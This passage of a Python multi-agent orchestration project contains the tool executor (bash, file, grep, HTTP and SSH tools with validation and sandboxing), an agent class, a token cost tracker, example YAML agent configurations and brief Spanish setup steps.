        
        # Rate limiting
        await self.rate_limiter.acquire()
        
        # Execute with retry
        async def do_execute():
            return await self._tools[tool](params)
        
        try:
            result, retries = await retry_with_backoff(
                do_execute,
                config=self.retry_config,
            )
            result.retries = retries
            result.execution_time = time.time() - start_time
            return result
        except Exception as e:
            return ToolResult(
                tool=tool,
                success=False,
                output="",
                error=str(e),
                execution_time=time.time() - start_time,
            )
    
    def parse_tool_calls(self, text: str) -> List[dict]:
        """
        Parse tool calls from text.
        
        Supports formats:
        - ```tool { ... } ```
        - ```json { "tool": ... } ```
        """
        calls = []
        
        # Format: ```tool ... ```
        pattern1 = r'```tool\s*\n?(.*?)\n?```'
        for match in re.findall(pattern1, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(data)
            except json.JSONDecodeError:
                continue
        
        # Format: ```json ... ``` with tool
        pattern2 = r'```json\s*\n?(.*?)\n?```'
        for match in re.findall(pattern2, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(data)
            except json.JSONDecodeError:
                continue
        
        return calls
    
    async def execute_from_text(self, text: str) -> List[ToolResult]:
        """Execute all tools found in text."""
        calls = self.parse_tool_calls(text)
        results = []
        
        for call in calls:
            tool = call.get("tool")
            params = call.get("params", {})
            result = await self.execute(tool, params)
            results.append(result)
        
        return results
    
    # ==================== TOOL IMPLEMENTATIONS ====================
    
    async def _exec_bash(self, params: dict) -> ToolResult:
        """Execute a bash command securely."""
        command = params.get("command", "")
        working_dir = params.get("working_dir")
        
        if not command:
            return ToolResult(tool="bash", success=False, output="", error="Empty command")
        
        # Validate command
        is_safe, error = self.validator.validate_command(command)
        if not is_safe:
            return ToolResult(tool="bash", success=False, output="", error=error)
        
        # Determine working directory
        cwd = self.working_dir
        if working_dir:
            is_valid, result = self.validator.validate_path(working_dir)
            if is_valid:
                cwd = Path(result)
        
        try:
            process = await asyncio.create_subprocess_exec(
                "/bin/bash", "-c", command,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=str(cwd),
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            return ToolResult(
                tool="bash",
                success=process.returncode == 0,
                output=stdout.decode("utf-8", errors="replace"),
                error=stderr.decode("utf-8", errors="replace") if process.returncode != 0 else None,
            )
        except asyncio.TimeoutError:
            return ToolResult(
                tool="bash",
                success=False,
                output="",
                error=f"Timeout after {self.timeout}s",
            )
    
    async def _exec_read(self, params: dict) -> ToolResult:
        """Read a file within the sandbox."""
        path = params.get("path", "")
        encoding = params.get("encoding", "utf-8")
        
        if not path:
            return ToolResult(tool="read", success=False, output="", error="Empty path")
        
        is_valid, result = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="read", success=False, output="", error=result)
        
        try:
            content = Path(result).read_text(encoding=encoding)
            return ToolResult(tool="read", success=True, output=content)
        except FileNotFoundError:
            return ToolResult(tool="read", success=False, output="", error=f"File not found: {path}")
        except Exception as e:
            return ToolResult(tool="read", success=False, output="", error=str(e))
    
    async def _exec_write(self, params: dict) -> ToolResult:
        """Write a file within the sandbox."""
        path = params.get("path", "")
        content = params.get("content", "")
        append = params.get("append", False)
        
        if not path:
            return ToolResult(tool="write", success=False, output="", error="Empty path")
        
        is_valid, result = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="write", success=False, output="", error=result)
        
        try:
            file_path = Path(result)
            file_path.parent.mkdir(parents=True, exist_ok=True)
            
            mode = "a" if append else "w"
            with open(file_path, mode) as f:
                f.write(content)
            
            return ToolResult(
                tool="write",
                success=True,
                output=f"Wrote {len(content)} bytes to {file_path.name}",
            )
        except Exception as e:
            return ToolResult(tool="write", success=False, output="", error=str(e))
    
    async def _exec_glob(self, params: dict) -> ToolResult:
        """Find files by glob pattern."""
        pattern = params.get("pattern", "")
        base_dir = params.get("base_dir")
        
        if not pattern:
            return ToolResult(tool="glob", success=False, output="", error="Empty pattern")
        
        search_dir = self.working_dir
        if base_dir:
            is_valid, result = self.validator.validate_path(base_dir)
            if is_valid:
                search_dir = Path(result)
        
        try:
            files = list(search_dir.glob(pattern))
            safe_files = []
            
            for f in files[:100]:  # Limit results
                try:
                    f.relative_to(self.working_dir)
                    safe_files.append(str(f.relative_to(self.working_dir)))
                except ValueError:
                    continue
            
            output = "\n".join(sorted(safe_files))
            return ToolResult(
                tool="glob",
                success=True,
                output=f"Found {len(safe_files)} files:\n{output}",
            )
        except Exception as e:
            return ToolResult(tool="glob", success=False, output="", error=str(e))
    
    async def _exec_grep(self, params: dict) -> ToolResult:
        """Search text in files."""
        pattern = params.get("pattern", "")
        path = params.get("path", "")
        recursive = params.get("recursive", False)
        
        if not pattern or not path:
            return ToolResult(tool="grep", success=False, output="", error="Pattern or path empty")
        
        is_valid, validated_path = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="grep", success=False, output="", error=validated_path)
        
        try:
            cmd = ["grep", "-n", "--color=never"]
            if recursive:
                cmd.append("-r")
            cmd.extend([pattern, validated_path])
            
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=str(self.working_dir),
            )
            
            stdout, _ = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            return ToolResult(tool="grep", success=True, output=stdout.decode())
        except Exception as e:
            return ToolResult(tool="grep", success=False, output="", error=str(e))
    
    async def _exec_http(self, params: dict) -> ToolResult:
        """Make an HTTP request."""
        url = params.get("url", "")
        method = params.get("method", "GET").upper()
        headers = params.get("headers", {})
        body = params.get("body", "")
        timeout = params.get("timeout", self.timeout)
        
        if not url:
            return ToolResult(tool="http_request", success=False, output="", error="Empty URL")
        
        try:
            data = body.encode() if body else None
            req = urllib.request.Request(url, data=data, method=method)
            
            for key, value in headers.items():
                req.add_header(key, value)
            
            with urllib.request.urlopen(req, timeout=timeout) as response:
                content = response.read().decode()
                return ToolResult(tool="http_request", success=True, output=content)
                
        except urllib.error.HTTPError as e:
            return ToolResult(
                tool="http_request",
                success=False,
                output=e.read().decode() if e.fp else "",
                error=f"HTTP {e.code}: {e.reason}",
            )
        except Exception as e:
            return ToolResult(tool="http_request", success=False, output="", error=str(e))
    
    async def _exec_ssh(self, params: dict) -> ToolResult:
        """Execute command via SSH."""
        host = params.get("host", "")
        command = params.get("command", "")
        user = params.get("user", "root")
        key_path = params.get("key_path", str(self.ssh_key_path))
        port = params.get("port", 22)
        
        if not host or not command:
            return ToolResult(tool="ssh", success=False, output="", error="Host or command empty")
        
        # Validate remote command too
        is_safe, error = self.validator.validate_command(command)
        if not is_safe:
            return ToolResult(tool="ssh", success=False, output="", error=f"Unsafe remote command: {error}")
        
        try:
            ssh_cmd = [
                "ssh",
                "-o", f"StrictHostKeyChecking={'yes' if self.ssh_strict_host_checking else 'no'}",
                "-o", "BatchMode=yes",
                "-o", "ConnectTimeout=10",
                "-i", key_path,
                "-p", str(port),
                f"{user}@{host}",
                command,
            ]
            
            process = await asyncio.create_subprocess_exec(
                *ssh_cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout,
            )
            
            return ToolResult(
                tool="ssh",
                success=process.returncode == 0,
                output=stdout.decode(),
                error=stderr.decode() if process.returncode != 0 else None,
            )
        except asyncio.TimeoutError:
            return ToolResult(
                tool="ssh",
                success=False,
                output="",
                error=f"SSH timeout after {self.timeout}s",
            )
        except Exception as e:
            return ToolResult(tool="ssh", success=False, output="", error=str(e))
    
    async def _exec_list_dir(self, params: dict) -> ToolResult:
        """List directory contents."""
        path = params.get("path", ".")
        recursive = params.get("recursive", False)
        include_hidden = params.get("include_hidden", False)
        
        is_valid, validated_path = self.validator.validate_path(path)
        if not is_valid:
            return ToolResult(tool="list_dir", success=False, output="", error=validated_path)
        
        try:
            dir_path = Path(validated_path)
            
            if not dir_path.exists():
                return ToolResult(
                    tool="list_dir",
                    success=False,
                    output="",
                    error=f"Directory not found: {path}",
                )
            
            entries = []
            pattern = "**/*" if recursive else "*"
            
            for entry in dir_path.glob(pattern):
                if not include_hidden and entry.name.startswith("."):
                    continue
                
                try:
                    entry.relative_to(self.working_dir)
                except ValueError:
                    continue
                
                entry_type = "d" if entry.is_dir() else "f"
                rel_path = entry.relative_to(dir_path)
                entries.append(f"[{entry_type}] {rel_path}")
            
            return ToolResult(
                tool="list_dir",
                success=True,
                output="\n".join(sorted(entries)[:200]),
            )
        except Exception as e:
            return ToolResult(tool="list_dir", success=False, output="", error=str(e))

orchestrator/agents/__init__.py

"""
Agent module.
"""

from .base import Agent, AgentResult

__all__ = ["Agent", "AgentResult"]

orchestrator/agents/base.py

"""
Agent implementation.

An Agent combines:
- A provider (Claude, LiteLLM, etc.)
- Tools
- A role/system prompt
- Logging
"""

import asyncio
from datetime import datetime
from pathlib import Path
from typing import Optional, List, Dict, Any
from dataclasses import dataclass, field

from ..config import get_config, AgentConfig
from ..providers import ClaudeProvider, LiteLLMProvider, ProviderResponse
from ..tools import ToolExecutor


@dataclass
class AgentResult:
    """Result of an agent execution."""
    success: bool
    output: str
    agent_name: str
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    error: Optional[str] = None
    tool_results: List[Dict] = field(default_factory=list)
    usage: Optional[Dict] = None
    retries: int = 0


class Agent:
    """
    Configurable AI agent.
    
    Combines a provider, tools, and a role to create
    a specialized AI assistant.
    """
    
    def __init__(
        self,
        name: str = "",
        role: str = "",
        provider: str = "claude",
        model: str = "sonnet",
        tools: Optional[List[str]] = None,
        servers: Optional[List[str]] = None,
        max_turns: int = 10,
        config_obj: Optional[AgentConfig] = None,
    ):
        """
        Initialize agent from parameters or config object.
        """
        if config_obj:
            self.name = config_obj.name
            self.role = config_obj.role
            self.provider_name = config_obj.provider
            self.model = config_obj.model
            self.tools = config_obj.tools or []
            self.servers = config_obj.servers or []
            self.max_turns = config_obj.max_turns
        else:
            self.name = name
            self.role = role
            self.provider_name = provider
            self.model = model
            self.tools = tools or []
            self.servers = servers or []
            self.max_turns = max_turns
        
        self.config = get_config()
        
        # Paths
        self.log_file = self.config.logs_dir / f"{self.name}.md"
        self.output_dir = self.config.outputs_dir / self.name
        
        # Create provider
        self.provider = self._create_provider()
        
        # Create tool executor for non-native tools
        self.tool_executor = self._create_tool_executor()
        
        # Build system prompt
        self.system_prompt = self._build_system_prompt()
        
        # Initialize
        self.output_dir.mkdir(parents=True, exist_ok=True)
        if not self.log_file.exists():
            self._init_log()
    
    def _create_provider(self):
        """Create the appropriate provider."""
        settings = self.config.settings
        
        common_kwargs = {
            "model": self.model,
            "timeout": settings.timeout,
            "max_retries": settings.max_retries,
            "rate_limit_per_minute": settings.rate_limit_per_minute,
            "enable_circuit_breaker": settings.enable_circuit_breaker,
            "circuit_breaker_threshold": settings.circuit_breaker_threshold,
            "circuit_breaker_timeout": settings.circuit_breaker_timeout,
        }
        
        if self.provider_name == "claude":
            return ClaudeProvider(
                max_turns=self.max_turns,
                working_directory=str(self.config.base_dir),
                **common_kwargs,
            )
        else:
            return LiteLLMProvider(
                max_tool_iterations=self.max_turns,
                **common_kwargs,
            )
    
    def _create_tool_executor(self) -> ToolExecutor:
        """Create tool executor for non-native tools."""
        settings = self.config.settings
        
        return ToolExecutor(
            working_dir=str(self.config.base_dir),
            timeout=settings.timeout,
            sandbox_paths=settings.sandbox_paths,
            allowed_commands=settings.allowed_commands or None,
            ssh_strict_host_checking=settings.ssh_strict_host_checking,
            rate_limit_per_minute=settings.rate_limit_per_minute,
            max_retries=settings.max_retries,
        )
    
    def _build_system_prompt(self) -> str:
        """Build the system prompt including role and server info."""
        prompt = f"# {self.name}\n\n{self.role}"
        
        if self.servers:
            prompt += "\n\n## Available Servers\n"
            for server_name in self.servers:
                server = self.config.get_server(server_name)
                if server:
                    prompt += f"- **{server_name}**: {server.user}@{server.host}"
                    if server.description:
                        prompt += f" ({server.description})"
                    prompt += "\n"
        
        return prompt
    
    def _init_log(self):
        """Initialize the log file."""
        header = f"""# {self.name}

- **Created:** {datetime.now().isoformat()}
- **Provider:** {self.provider_name}
- **Model:** {self.model}
- **Tools:** {', '.join(self.tools) if self.tools else 'none'}

---

"""
        self.log_file.write_text(header)
    
    def log(self, entry_type: str, content: str):
        """Add entry to log file."""
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        entry = f"\n## {timestamp} | {entry_type}\n\n{content}\n"
        
        with open(self.log_file, "a") as f:
            f.write(entry)
    
    def _get_non_native_tools(self) -> List[str]:
        """Get tools that need manual execution (not native to provider)."""
        if self.provider_name == "claude":
            # Claude CLI handles: bash, read, write, edit, glob, grep, webfetch
            native = {"bash", "read", "write", "edit", "glob", "grep", "webfetch", "web_fetch"}
            return [t for t in self.tools if t.lower() not in native]
        else:
            # LiteLLM doesn't have native tools
            return self.tools
    
    async def run(self, prompt: str, log_action: bool = True) -> AgentResult:
        """
        Execute a prompt through this agent.
        """
        if log_action:
            self.log("PROMPT", prompt[:500] + "..." if len(prompt) > 500 else prompt)
        
        try:
            # Determine which tools need manual handling
            non_native_tools = self._get_non_native_tools()
            
            # For Claude provider, pass all tools (it handles native ones)
            # For LiteLLM, we need to handle tools ourselves
            if self.provider_name == "claude":
                response = await self.provider.run_with_tools(
                    prompt=prompt,
                    tools=self.tools,
                    system_prompt=self.system_prompt,
                )
            else:
                # LiteLLM with tool execution
                response = await self.provider.run_with_tools(
                    prompt=prompt,
                    tools=self.tools,
                    system_prompt=self.system_prompt,
                    tool_executor=self.tool_executor,
                )
            
            # Build result
            result = AgentResult(
                success=response.success,
                output=response.text,
                agent_name=self.name,
                error=response.error,
                tool_results=[
                    {
                        "tool": tr.tool,
                        "success": tr.success,
                        "output": tr.output[:200] if tr.output else "",
                        "error": tr.error,
                    }
                    for tr in response.tool_results
                ],
                usage=response.usage.to_dict() if response.usage else None,
                retries=response.retries,
            )
            
            if log_action:
                status = "RESULT" if response.success else "ERROR"
                content = response.text[:500] if response.success else (response.error or "Unknown error")
                self.log(status, content)
            
            return result
            
        except Exception as e:
            if log_action:
                self.log("ERROR", str(e))
            
            return AgentResult(
                success=False,
                output="",
                agent_name=self.name,
                error=str(e),
            )
    
    async def run_with_context(
        self,
        prompt: str,
        context: str,
        log_action: bool = True,
    ) -> AgentResult:
        """
        Execute a prompt with additional context.
        """
        full_prompt = f"{context}\n\n---\n\n{prompt}"
        return await self.run(full_prompt, log_action)
    
    def save_output(self, filename: str, content: str) -> Path:
        """Save content to the agent's output directory."""
        filepath = self.output_dir / filename
        filepath.parent.mkdir(parents=True, exist_ok=True)
        filepath.write_text(content)
        self.log("FILE", f"Created: {filepath}")
        return filepath
    
    def read_log(self, last_n: Optional[int] = None) -> str:
        """Read the agent's log file."""
        if not self.log_file.exists():
            return ""
        
        content = self.log_file.read_text()
        
        if last_n:
            entries = content.split("\n## ")
            return "\n## ".join(entries[-last_n:])
        
        return content
    
    async def health_check(self) -> bool:
        """Check if the agent's provider is healthy."""
        return await self.provider.health_check()
    
    def __repr__(self) -> str:
        return f"Agent({self.name}, {self.provider_name}/{self.model})"

orchestrator/tracking/__init__.py

"""
Cost tracking module.

Track token usage and costs across providers.
"""

from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional
import json


# Cost per million tokens (approximate, may vary)
COST_PER_MILLION = {
    # Claude models
    "claude-opus-4-20250514": {"input": 15.0, "output": 75.0},
    "claude-sonnet-4-20250514": {"input": 3.0, "output": 15.0},
    "claude-3-5-haiku-latest": {"input": 0.25, "output": 1.25},
    
    # OpenAI models
    "gpt-4o": {"input": 2.5, "output": 10.0},
    "gpt-4o-mini": {"input": 0.15, "output": 0.6},
    "gpt-4-turbo": {"input": 10.0, "output": 30.0},
    "o1-preview": {"input": 15.0, "output": 60.0},
    "o1-mini": {"input": 3.0, "output": 12.0},
    
    # Google models
    "gemini/gemini-1.5-pro": {"input": 1.25, "output": 5.0},
    "gemini/gemini-1.5-flash": {"input": 0.075, "output": 0.3},
    
    # Default for unknown models
    "default": {"input": 1.0, "output": 3.0},
}


@dataclass
class RequestCost:
    """Cost information for a single request."""
    model: str
    input_tokens: int
    output_tokens: int
    cache_read_tokens: int = 0
    cache_creation_tokens: int = 0
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    
    @property
    def total_tokens(self) -> int:
        return self.input_tokens + self.output_tokens
    
    @property
    def input_cost(self) -> float:
        """Calculate input cost in USD."""
        rates = COST_PER_MILLION.get(self.model, COST_PER_MILLION["default"])
        # Cache reads are typically 90% cheaper
        regular_input = self.input_tokens - self.cache_read_tokens
        cache_cost = (self.cache_read_tokens / 1_000_000) * rates["input"] * 0.1
        regular_cost = (regular_input / 1_000_000) * rates["input"]
        return regular_cost + cache_cost
    
    @property
    def output_cost(self) -> float:
        """Calculate output cost in USD."""
        rates = COST_PER_MILLION.get(self.model, COST_PER_MILLION["default"])
        return (self.output_tokens / 1_000_000) * rates["output"]
    
    @property
    def total_cost(self) -> float:
        """Total cost in USD."""
        return self.input_cost + self.output_cost


@dataclass
class CostSummary:
    """Summary of costs over multiple requests."""
    total_requests: int = 0
    total_input_tokens: int = 0
    total_output_tokens: int = 0
    total_cache_read_tokens: int = 0
    total_cost_usd: float = 0.0
    by_model: Dict[str, Dict] = field(default_factory=dict)
    
    def to_dict(self) -> dict:
        return {
            "total_requests": self.total_requests,
            "total_input_tokens": self.total_input_tokens,
            "total_output_tokens": self.total_output_tokens,
            "total_tokens": self.total_input_tokens + self.total_output_tokens,
            "total_cache_read_tokens": self.total_cache_read_tokens,
            "total_cost_usd": round(self.total_cost_usd, 6),
            "by_model": self.by_model,
        }


class CostTracker:
    """
    Track costs across multiple requests.
    
    Usage:
        tracker = CostTracker(budget_limit=10.0)
        
        # Record usage
        tracker.record(model="claude-sonnet-4-20250514", input_tokens=1000, output_tokens=500)
        
        # Check status
        print(tracker.summary)
        print(tracker.remaining_budget)
    """
    
    def __init__(
        self,
        budget_limit: Optional[float] = None,
        on_budget_warning: Optional[callable] = None,
        warning_threshold: float = 0.8,
    ):
        """
        Args:
            budget_limit: Optional budget limit in USD
            on_budget_warning: Callback when approaching budget
            warning_threshold: Fraction of budget to trigger warning (0.8 = 80%)
        """
        self.budget_limit = budget_limit
        self.on_budget_warning = on_budget_warning
        self.warning_threshold = warning_threshold
        
        self._requests: List[RequestCost] = []
        self._warning_sent = False
    
    def record(
        self,
        model: str,
        input_tokens: int,
        output_tokens: int,
        cache_read_tokens: int = 0,
        cache_creation_tokens: int = 0,
    ) -> RequestCost:
        """Record a request's token usage."""
        cost = RequestCost(
            model=model,
            input_tokens=input_tokens,
            output_tokens=output_tokens,
            cache_read_tokens=cache_read_tokens,
            cache_creation_tokens=cache_creation_tokens,
        )
        
        self._requests.append(cost)
        
        # Check budget
        if self.budget_limit and not self._warning_sent:
            if self.total_cost >= self.budget_limit * self.warning_threshold:
                self._warning_sent = True
                if self.on_budget_warning:
                    self.on_budget_warning(self.total_cost, self.budget_limit)
        
        return cost
    
    def record_from_response(self, response) -> Optional[RequestCost]:
        """Record from a ProviderResponse object."""
        if not response.usage:
            return None
        
        return self.record(
            model=response.model,
            input_tokens=response.usage.input_tokens,
            output_tokens=response.usage.output_tokens,
            cache_read_tokens=getattr(response.usage, 'cache_read_tokens', 0),
            cache_creation_tokens=getattr(response.usage, 'cache_creation_tokens', 0),
        )
    
    @property
    def total_cost(self) -> float:
        """Total cost across all requests."""
        return sum(r.total_cost for r in self._requests)
    
    @property
    def total_tokens(self) -> int:
        """Total tokens across all requests."""
        return sum(r.total_tokens for r in self._requests)
    
    @property
    def remaining_budget(self) -> Optional[float]:
        """Remaining budget in USD, or None if no limit."""
        if self.budget_limit is None:
            return None
        return max(0, self.budget_limit - self.total_cost)
    
    @property
    def is_over_budget(self) -> bool:
        """Check if over budget."""
        if self.budget_limit is None:
            return False
        return self.total_cost >= self.budget_limit
    
    @property
    def summary(self) -> CostSummary:
        """Get cost summary."""
        summary = CostSummary()
        
        for request in self._requests:
            summary.total_requests += 1
            summary.total_input_tokens += request.input_tokens
            summary.total_output_tokens += request.output_tokens
            summary.total_cache_read_tokens += request.cache_read_tokens
            summary.total_cost_usd += request.total_cost
            
            # By model
            if request.model not in summary.by_model:
                summary.by_model[request.model] = {
                    "requests": 0,
                    "input_tokens": 0,
                    "output_tokens": 0,
                    "cost_usd": 0.0,
                }
            
            summary.by_model[request.model]["requests"] += 1
            summary.by_model[request.model]["input_tokens"] += request.input_tokens
            summary.by_model[request.model]["output_tokens"] += request.output_tokens
            summary.by_model[request.model]["cost_usd"] += request.total_cost
        
        return summary
    
    def reset(self):
        """Reset all tracked costs."""
        self._requests = []
        self._warning_sent = False
    
    def export(self) -> str:
        """Export cost data as JSON."""
        return json.dumps({
            "requests": [
                {
                    "model": r.model,
                    "input_tokens": r.input_tokens,
                    "output_tokens": r.output_tokens,
                    "cache_read_tokens": r.cache_read_tokens,
                    "total_cost": r.total_cost,
                    "timestamp": r.timestamp,
                }
                for r in self._requests
            ],
            "summary": self.summary.to_dict(),
            "budget_limit": self.budget_limit,
        }, indent=2)

Ejemplos de Configuración

examples/simple.yaml

# Simple single agent configuration

settings:
  default_provider: claude
  default_model: sonnet

agents:
  assistant:
    role: "You are a helpful assistant."
    provider: claude
    model: sonnet
    tools:
      - bash
      - read
      - write

examples/dev_team.yaml

# Software development team

settings:
  default_provider: claude
  default_model: sonnet
  timeout: 300
  sandbox_paths: true

agents:
  architect:
    role: |
      You are a senior software architect.
      You design scalable and maintainable systems.
      You make important technical decisions.
      You document decisions in ADRs (Architecture Decision Records).
    provider: claude
    model: opus
    tools:
      - read
      - write
      - list_dir
      - glob
  
  developer:
    role: |
      You are an experienced full-stack developer.
      You write clean, well-documented, and testable code.
      You follow language best practices.
      You always include appropriate error handling.
    provider: claude
    model: sonnet
    tools:
      - read
      - write
      - bash
      - grep
      - glob
  
  reviewer:
    role: |
      You are a demanding but constructive code reviewer.
      You look for bugs, security issues, and improvements.
      You suggest refactoring when needed.
      You validate that code follows standards.
    provider: litellm
    model: gpt4o
    tools:
      - read
      - grep
      - glob
  
  tester:
    role: |
      You are a QA engineer specialized in testing.
      You write unit, integration, and e2e tests.
      You identify edge cases and error scenarios.
      You ensure good test coverage.
    provider: litellm
    model: gemini-pro
    tools:
      - read
      - write
      - bash

examples/devops.yaml

# DevOps team with server access

settings:
  default_provider: claude
  default_model: sonnet
  timeout: 300
  ssh_strict_host_checking: true

servers:
  production:
    host: prod.example.com
    user: deploy
    key: ~/.ssh/deploy_key
    description: "Production server"
  
  staging:
    host: staging.example.com
    user: deploy
    key: ~/.ssh/deploy_key
    description: "Staging server"

agents:
  deployer:
    role: |
      You are a deployment specialist.
      You deploy applications safely to production.
      You always verify deployments succeed.
      You rollback immediately if issues are detected.
    provider: claude
    model: sonnet
    tools:
      - ssh
      - bash
      - read
    servers:
      - production
      - staging
  
  monitor:
    role: |
      You are a systems monitoring expert.
      You check server health and metrics.
      You identify issues before they become problems.
    provider: claude
    model: haiku
    tools:
      - ssh
      - http_request
      - read
    servers:
      - production
      - staging

examples/local_ollama.yaml

# Using local Ollama models (no API costs!)
#
# Requirements:
# 1. Install Ollama: https://ollama.ai
# 2. Pull models: ollama pull llama3
# 3. pip install litellm

settings:
  default_provider: litellm
  default_model: llama3
  timeout: 120
  max_tool_iterations: 15

agents:
  assistant:
    role: |
      You are a helpful assistant running locally.
      You can execute commands and work with files.
    provider: litellm
    model: llama3
    tools:
      - bash
      - read
      - write
      - list_dir
  
  coder:
    role: |
      You are a coding assistant specialized in programming.
      You write clean, efficient code.
    provider: litellm
    model: codellama
    tools:
      - read
      - write
      - bash
      - grep

.env.example

# .env.example - Copy to .env and fill in your values

# API Keys
OPENAI_API_KEY=sk-...
GOOGLE_API_KEY=...
ANTHROPIC_API_KEY=...
MISTRAL_API_KEY=...
GROQ_API_KEY=...

# SSH Configuration
SSH_KEY_PATH=~/.ssh/id_rsa
SSH_KNOWN_HOSTS_CHECK=true

.gitignore

# Environment
.env
.venv/
venv/

# Python
__pycache__/
*.py[cod]
*.egg-info/

# IDE
.idea/
.vscode/

# Logs and outputs
logs/*.md
!logs/.gitkeep
outputs/**
!outputs/.gitkeep

# Secrets
*.pem
*.key

Uso Rápido

# 1. Crear estructura de directorios
mkdir -p tzzr_v6/orchestrator/{core,providers,tools,agents,tracking}
mkdir -p tzzr_v6/{logs,outputs,examples}

# 2. Copiar cada archivo del código de arriba a su ubicación correspondiente

# 3. Instalar dependencias
pip install pyyaml
pip install litellm  # opcional, para GPT-4/Gemini/etc

# 4. Ejecutar
cd tzzr_v6
python main.py